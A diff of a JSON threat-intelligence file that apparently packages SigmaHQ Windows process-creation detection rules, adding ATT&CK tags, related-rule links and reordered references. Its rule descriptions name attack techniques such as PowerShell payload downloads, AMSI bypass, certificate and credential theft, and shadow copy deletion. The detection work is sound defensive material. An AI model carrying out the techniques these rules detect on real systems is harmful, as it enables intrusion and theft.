"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_dll.yml" ], - "tags": "No established tags" + "tags": [ + "attack.command_and_control", + "attack.execution", + "attack.t1059.001", + "attack.t1105" + ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0f0450f3-8b47-441e-a31b-15a91dc243e2", "value": "Potential DLL File Download Via PowerShell Invoke-WebRequest" }, @@ -60726,11 +61629,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://forensicitguy.github.io/agenttesla-vba-certutil-download/", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", - "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", + "https://forensicitguy.github.io/agenttesla-vba-certutil-download/", + "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://twitter.com/egre55/status/1087685529016193025", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml" ], "tags": [ @@ -60829,8 +61732,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade-", "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", + "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade-", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml" ], "tags": [ @@ -60934,46 +61837,22 @@ "https://redcanary.com/blog/blackbyte-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml" ], - "tags": "No established tags" - }, - "uuid": "52d097e2-063e-4c9c-8fbb-855c8948d135", - "value": "Suspicious Windows Update Agent Empty Cmdline" - }, - { - "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", - "meta": { - "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)", - "creation_date": "2020/07/03", - "falsepositive": [ - "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", - "When cmd.exe and xcopy.exe are called directly", - "When the command contains the keywords but not in the correct order" - ], - "filename": "proc_creation_win_susp_copy_system32.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120", - "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml" - ], "tags": [ "attack.defense_evasion", - "attack.t1036.003" + "attack.t1036" ] }, "related": [ { - "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], - "uuid": "fff9d2b7-e11c-4a69-93d3-40ef66189767", - "value": "Suspicious Copy From or To System32" + "uuid": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "value": "Suspicious Windows Update Agent Empty Cmdline" }, { "description": "Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.", @@ -60988,13 +61867,34 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", "https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_export_certificate.yml" ], - "tags": "No established tags" + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1552.004", + "attack.t1059.001" + ] }, + "related": [ + { + "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9e716b33-63b2-46da-86a4-bd3c3b9b5dfb", "value": "Certificate Exported Via PowerShell" }, @@ -61011,9 +61911,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib", + "https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system.yml" ], "tags": [ @@ -61103,8 +62003,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", + "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", "https://guides.lib.umich.edu/c.php?g=282942&p=1885348", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_extensions.yml" ], @@ -61138,8 +62038,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/cd3690b100a495885c407282d0c94c85f48a8a2e/atomics/T1218.011/T1218.011.md", "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", + "https://github.com/redcanaryco/atomic-red-team/blob/cd3690b100a495885c407282d0c94c85f48a8a2e/atomics/T1218.011/T1218.011.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_script_run.yml" ], "tags": [ @@ -61172,9 +62072,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", + "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml" ], "tags": [ @@ -61241,8 +62141,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ss64.com/nt/logman.html", "https://twitter.com/0gtweet/status/1359039665232306183?s=21", + "https://ss64.com/nt/logman.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logman_disable_eventlog.yml" ], "tags": [ @@ -61283,11 +62183,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/cglyer/status/1355171195654709249", - "https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html", "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://twitter.com/cglyer/status/1355171195654709249", "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_uninstall_security_products.yml" ], "tags": [ @@ -61321,8 +62221,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/frgnca/AudioDeviceCmdlets", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", "https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml" ], "tags": [ @@ -61355,9 +62255,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" ], "tags": [ @@ -61390,9 +62290,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://nodejs.org/api/cli.html", - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://nodejs.org/api/cli.html", "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml" ], @@ -61427,8 +62327,8 @@ "logsource.product": "windows", "refs": [ "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b", - "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://github.com/hfiref0x/UACME", + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml" ], "tags": [ @@ -61495,8 +62395,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior", "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware", + "https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml" ], "tags": [ @@ -61562,8 +62462,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml" ], "tags": [ @@ -61632,8 +62532,28 @@ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml" ], - "tags": "No established tags" + "tags": [ + "attack.credential_access", + "attack.t1588.002", + "attack.t1003" + ] }, + "related": [ + { + "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "24e3e58a-646b-4b50-adef-02ef935b9fc8", "value": "Suspicious Hacktool Execution - Imphash" }, @@ -61703,20 +62623,25 @@ "value": "Uncommon Child Processes Of SndVol.exe" }, { - "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", + "description": "Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of \".asar\" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022/10/21", "falsepositive": [ - "Unknown" + "Legitimate child processes can occur in cases of debugging" ], "filename": "proc_creation_win_susp_electron_app_children.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://taggart-tech.com/quasar-electron/", "https://github.com/mttaggart/quasar", + "https://taggart-tech.com/quasar-electron/", + "https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf", + "https://lolbas-project.github.io/lolbas/Binaries/Msedge/", + "https://lolbas-project.github.io/lolbas/Binaries/Teams/", + "https://positive.security/blog/ms-officecmd-rce", + "https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml" ], "tags": [ @@ -61815,13 +62740,58 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", "http://www.xuetr.com/", + "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_pchunter.yml" ], - "tags": "No established tags" + "tags": [ + "attack.execution", + "attack.discovery", + "attack.t1082", + "attack.t1057", + "attack.t1012", + "attack.t1083", + "attack.t1007" + ] }, + "related": [ + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fca949cc-79ca-446e-8064-01aa7e52ece5", "value": "HackTool - PCHunter Execution" }, @@ -62029,8 +62999,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.sans.org/blog/wmic-for-incident-response/", "https://github.com/redcanaryco/atomic-red-team/blob/84215139ee5127f8e3a117e063b604812bd71928/atomics/T1047/T1047.md#atomic-test-5---wmi-execute-local-process", + "https://www.sans.org/blog/wmic-for-incident-response/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_process_creation.yml" ], "tags": [ @@ -62088,8 +63058,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/", "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", + "https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml" ], "tags": [ @@ -62340,8 +63310,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/", "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml" ], "tags": [ @@ -62397,9 +63367,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/", - "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html", "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/", + "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html", + "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml" ], "tags": [ @@ -62423,9 +63393,9 @@ "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/", + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", "https://www.pureid.io/dumping-abusing-windows-credentials-part-1/", "https://twitter.com/0gtweet/status/1299071304805560321?s=21", - "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml" ], "tags": [ @@ -62527,9 +63497,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://en.wikipedia.org/wiki/HTML_Application", "https://www.echotrail.io/insights/search/mshta.exe", "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://en.wikipedia.org/wiki/HTML_Application", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml" ], "tags": [ @@ -62562,10 +63532,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior", - "https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior", - "https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior", "https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior", + "https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior", + "https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior", + "https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml" ], "tags": [ @@ -62600,10 +63570,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/", - "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/", - "https://twitter.com/gN3mes1s/status/1206874118282448897", "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1027.004/T1027.004.md#atomic-test-1---compile-after-delivery-using-cscexe", + "https://twitter.com/gN3mes1s/status/1206874118282448897", + "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/", + "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml" ], "tags": [ @@ -62712,9 +63683,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://www.nirsoft.net/utils/nircmd2.html#using", "https://www.nirsoft.net/utils/nircmd.html", + "https://www.nirsoft.net/utils/nircmd2.html#using", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nircmd_as_system.yml" ], "tags": [ @@ -62972,8 +63943,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)", "https://github.com/swagkarna/Defeat-Defender-V1.2.0", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_permission_modifications.yml" ], @@ -63007,8 +63978,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", + "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dnx.yml" ], "tags": [ @@ -63073,8 +64044,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/danielbohannon/Invoke-DOSfuscation", "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf", + "https://github.com/danielbohannon/Invoke-DOSfuscation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml" ], "tags": [ @@ -63107,8 +64078,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/", "https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html", + "https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml" ], "tags": [ @@ -63218,8 +64189,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/", "https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter", + "https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml" ], "tags": [ @@ -63277,9 +64248,9 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1105/T1105.md#atomic-test-18---curl-download-file", - "https://twitter.com/max_mal_/status/1542461200797163522", "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt", + "https://twitter.com/max_mal_/status/1542461200797163522", "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_susp_download.yml" ], @@ -63333,6 +64304,45 @@ "uuid": "2a072a96-a086-49fa-bcb5-15cc5a619093", "value": "Start Windows Service Via Net.EXE" }, + { + "description": "Detects execution of \"Diskshadow.exe\" in script mode to execute an script with a potentially uncommon extension.\nInitial baselining of the allowed extension list is required.\n", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2023/09/15", + "falsepositive": [ + "False postitve might occur with legitimate or uncommon extensions used internally. Initial baseline is required." + ], + "filename": "proc_creation_win_diskshadow_script_mode_susp_ext.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware", + "https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/", + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", + "https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4", + "https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "1dde5376-a648-492e-9e54-4241dd9b0c7f", + "value": "Diskshadow Script Mode - Uncommon Script Extension Execution" + }, { "description": "Detects user accept agreement execution in psexec commandline", "meta": { @@ -63456,8 +64466,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", "https://www.intrinsec.com/apt27-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml" ], @@ -63575,8 +64585,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/", "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d", + "https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_plink_port_forwarding.yml" ], "tags": [ @@ -63650,9 +64660,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5", "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", - "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml" ], "tags": [ @@ -63686,8 +64696,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/tccontre18/status/1480950986650832903", - "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/", "https://twitter.com/mrd0x/status/1461041276514623491", + "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml" ], "tags": [ @@ -63720,8 +64730,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md", 